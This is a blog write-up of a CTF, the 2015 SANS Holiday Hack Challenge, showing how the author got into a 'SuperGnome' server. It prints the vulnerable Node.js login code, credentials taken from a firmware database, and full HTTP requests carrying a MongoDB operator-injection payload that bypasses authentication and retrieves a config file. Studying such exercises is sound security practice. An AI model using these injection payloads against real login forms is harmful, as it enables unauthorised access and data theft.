Write up: 2015 Sans Holiday Hack Challenge – Part 4.3

Introduction

San Institute regularly creates a Christmas holiday hack challenge.

These challenges are a good way to try out new techniques or grow your knowledge in some new area.

As I get time to tackle the challenges I will write up my solution, frustrations and share any techniques that may come in handy for future challenges.

Challenge

List of SuperGnome IP addresses were obtained from challenge 4 and verified with Tom Hessman.

Part 4 of the challenge https://holidayhackchallenge.com/

7) Please describe the vulnerabilities you discovered in the Gnome firmware.

8) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN IN THE DOSIS NEIGHBORHOOD, attempt to remotely exploit each of the SuperGnomes. Describe the technique you used to gain access to each SuperGnome’s gnome.conf file. YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE DOSIS NEIGHBORHOOD EXPLICITLY ACKNOWLEDGES AS “IN SCOPE.” ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.

Please note: Although each SuperGnome is remotely exploitable based on flaws you can discover in the Gnome firmware, we DO NOT expect every participant to compromise every SuperGnome. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all five SuperGnomes, we happily accept partial answers and point out that they too are eligible for any of the prizes.

Looks like we have to compromise the following hosts on the Internet

52.192.152.132
52.2.229.189
54.233.105.81
52.64.191.71
52.34.3.80

Vulnerabilities can be discovered by looking at the firmware dump.

Flag “Your goal is to retrieve the /gnome/www/files/gnome.conf file from each SuperGnome.”

52.64.191.71

Time to take a poke at the live host.

I’m going to fire up ‘Burp Suite Pro’ and configure my ‘Iceweasel’ to proxy through Burp using ‘foxyproxy’ plugin.

When hitting the server we see the Supergnome’s name which in this case is

SuperGnome 03

We are prompted for a username and password.

Using ‘admin’ and ‘SittingOnAShelf’ as the password doesn’t get us in. Authentication is probably the clue.

Let’s take a look around the web source code obtained from the firmware.

There appears to be a potential for mongodb injection on line 110 if it’s uncommented

105 // LOGIN POST
 106 router.post('/', function(req, res, next) {
 107 var db = req.db;
 108 var msgs = [];
 109 db.get('users').findOne({username: req.body.username, password: req.body.password}, function (err, user) { // STUART 109 : Removed this in favor of below. Really guys?
 110 //db.get('users').findOne({username: (req.body.username || "").toString(10), password: (req.body.password || "").toS 110 tring(10)}, function (err, user) { // LOUISE: allow passwords longer than 10 chars
 111 if (err || !user) {
 112 console.log('Invalid username and password: ' + req.body.username + '/' + req.body.password);
 113 msgs.push('Invalid username or password!');
 114 res.msgs = msgs;
 115 res.render('index', { title: 'GIYH::ADMIN PORT V.01', session: sessions[req.cookies.sessionid], res: res });
 116 } else {

I followed the instructions (at least I thought I did) from this post http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html and I tried injecting these values into the post form but failed in my attempts

username={"$gt":""}&password={"$gt":""}

At this point I decided to start up a local copy of the mongodb files obtained from the firmware and take a further look.

Mongodb

apt-get install mongodb

Copy over the mongodb database files to where ever your /etc/mongodb.conf points its path to.

$ sudo cp /tmp/firmware/opt/mongodb/gnome.* /var/lib/mongodb/

make sure file permission are set correctly

$ sudo chown mongodb:nogroup /var/lib/mongodb/gnome.*

Start mongodb

$ sudo service mongodb start

Enter the mongodb shell

$ mongo
 MongoDB shell version: 2.4.10
 connecting to: test

List available databases

> show dbs
 gnome 0.078125GB
 local 0.078125GB
 test (empty)

switch to gnome database and list collections

> use gnome
 switched to db gnome
> show collections
 cameras
 settings
 status
 system.indexes
 users
> db.users.find()
 { "_id" : ObjectId("56229f58809473d11033515b"), "username" : "user", "password" : "user", "user_level" : 10 }
 { "_id" : ObjectId("56229f63809473d11033515c"), "username" : "admin", "password" : "SittingOnAShelf", "user_level" : 100 }

Hmm I wonder if I should use this alternative user account (user) which could lead to privilege escalation

I was able to login with user:user and as expected I don’t have enough privilege to access the app features.

Back to the source code for potential privilege escalation.

Tried a bunch of other things but no success.

I then wondered if I could take my debugging a step further by getting a local running instance of the super gnome app. I’d never done anything with nodejs or mongodb previous to this and there seemed like no other better time to start than now.

What a nightmare getting super gnome running on kali 2. I had an issue with dependencies, in particular mongodb and mongoskin.

This post helped me

https://github.com/baumanno/assignments-ws-15-16/commit/b5033b206715430b76437d08ac4956772af797cd

 

To summarize the steps

sudo apt-get install npm

change

"mongodb": "^2.0.46",
to
 "mongodb": "^1.4.4",
sudo rm -fr node_modules
$ sudo npm install --unsafe-perm --save

This project looked interesting to help with debugging but I wasn’t able to get it working. Might come back to it some other time

Help with debugging nodejs app https://github.com/node-inspector/node-inspector

$ sudo npm install -g node-inspector

 

I made sure to create a mongodb account called ‘gnome’

remote@kali:~/projects/sans$ mongo
MongoDB shell version: 2.4.10
connecting to: test
> use gnome
switched to db gnome
> db.addUser({user:"gnome",pwd:"",roles: [ "readWrite", "dbAdmin" ]
... } )
{
 "user" : "gnome",
 "pwd" : "2b267af3f77930a4197c31b74d0d3a51",
 "roles" : [
 "readWrite",
 "dbAdmin"
 ],
 "_id" : ObjectId("5673ae1a114c4ce74caa64e0")
}
> ^C
bye

And updated the app.js creds for the db.

Started the app with

$ ./bin/www

Could see my requests hitting my local server

POST / 200 42.523 ms - 1973
Invalid username and password: {"$gt":""}/{"$gt":""}

But still not working.

At this point a friend told me to go back to the original injection article and look carefully at the example post request and the content type.

It was at this point I felt really really stupid.

I changed my post type from

Content-Type: application/x-www-form-urlencoded
Content-Length: 39
username={"$gt":""}&password={"$gt":""}

to

Content-Type: application/json
Content-Length: 63
{
 "username": {"$gt": ""},
 "password": {"$gt": ""}
}

at which point I received a successful redirect and authentication cookie.

But I guessed that the successful db injection most likely returned the first user account row in the table/collection which would be a low privileged account.

I made small change to the injection request to match on any account not equal to ‘user’ hoping the next row would be ‘admin’.

POST / HTTP/1.1
Host: 52.64.191.71
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://52.64.191.71/
Cookie: sessionid=u3OSpEM8xiTOPGVQrriw
Connection: keep-alive
Content-Type: application/json
Content-Length: 55

{
“username”:{“$ne”:”user”},
“password”:{“$gt”:””}
}

HTTP/1.1 301 Moved Permanently
X-Powered-By: GIYH::SuperGnome by AtnasCorp
Set-Cookie: sessionid=yjziVIRDTnfod60F0m29; Path=/
Location: /
Date: Fri, 18 Dec 2015 09:12:04 GMT
Connection: keep-alive
Content-Length: 0

Time to see we can retrieve the gnome.conf file

GET /files?d=gnome.conf HTTP/1.1
Host: 52.64.191.71
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://52.2.229.189/files
Cookie: sessionid=yjziVIRDTnfod60F0m29
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: GIYH::SuperGnome by AtnasCorp
Date: Fri, 18 Dec 2015 09:07:31 GMT
Connection: keep-alive
Content-Length: 339
Gnome Serial Number: THX1138
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-03
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/

Flag is THX1138

 

Thank you

One thought on “Write up: 2015 Sans Holiday Hack Challenge – Part 4.3

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s